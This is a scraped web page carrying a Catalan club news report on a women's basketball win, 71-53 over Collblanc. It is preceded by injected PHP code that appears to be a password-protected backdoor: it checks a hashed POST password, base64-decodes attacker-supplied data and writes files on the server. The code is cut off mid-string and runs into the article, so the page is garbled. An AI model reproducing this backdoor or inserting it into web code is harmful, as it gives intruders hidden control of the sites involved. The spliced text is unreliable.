function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet, amb estones de gran joc, guanya el Collblanc (71-53) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet, amb estones de gran joc, guanya el Collblanc (71-53)

Updated: gener 17, 2015

El Nemser TGN Bàsquet va tornar a trobar el triomf en un partit que va començar de forma irregular però en què va acabar passant per damunt del seu rival, el Collblanc. L’equip de l’Hospitalet del Llobregat, que ocupa la tercera posició per la cua amb només dues victòries, no era, però, un rival tan assequible com la seva classificació pot demostrar. Així, el Collblanc només va perdre per 2 punts contra el Samà Vilanova la setmana passada i va plantejar greus problemes al CBT al Serrallo i d’altres equips de la part alta de la classificació.

El començament de partit va semblar demostrar el fet que les visitants no venien a passejar-se -tot i comptar només amb 8 jugadores. El Collblanc va defensar bé i, en atac, va trobar una certa fluïdesa anotadora que li va permetre anar per davant en el resultat durant alguns minuts. El Nemser TGN Bàsquet no trobava la cistella contrària i el primer quart es va tancar amb empat a 16. L’equip local va moure molt bé la pilota durant la primera meitat però els tirs de tres punts, amb les jugadores completament soles, no van entrar i això va mantenir la incertesa en el marcador durant alguns minuts (24-20). A partir d’aquells moments, però, es va veure la millor versió de les noies de Jordi Hernández que, en cinc minuts, van fer un parcial de 12-3 que deixava les coses molt bé en vista a la segona meitat (36-23).

Les pèrdues de pilota de les visitants per culpa de la bona pressió defensiva del Nemser TGN Bàsquet, la connexió entre pivots aprofitant l’alçada d’Ester Farré, els tirs exteriors de Laura Martínez i la confiança de l’equip, van fer que el tercer període fos clau per sentenciar el matx (51-32). Els últims deu minuts van ser una demostració de superioritat del conjunt lila sota la batuta de Laura Vilamajor (61-41, minut 35) i l’únic interès era saber quina seria la diferència final, que hauria estat més gran si la visitant L. Ros no hagués fet la cistella del partit -i de la temporada- després de clavar un triple des del mig camp amb el rellotge a zero.